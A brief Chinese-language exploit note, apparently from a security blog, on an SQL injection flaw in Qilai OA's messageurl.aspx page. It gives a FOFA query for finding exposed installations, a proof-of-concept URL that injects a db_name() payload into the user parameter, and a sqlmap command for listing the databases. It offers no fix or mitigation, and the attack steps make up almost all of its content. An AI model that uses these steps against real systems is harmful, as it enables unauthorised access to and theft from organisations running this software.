啟萊OA_messageurl.aspx_SQL注入漏洞

# 啟萊OA messageurl.aspx SQL注入漏洞
==FOFA==

app="启莱OA"

存在SQL注入的文件為 messageurl.aspx

http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1

==SQLMAP==

sqlmap -u "http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1" -p users --dbs
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容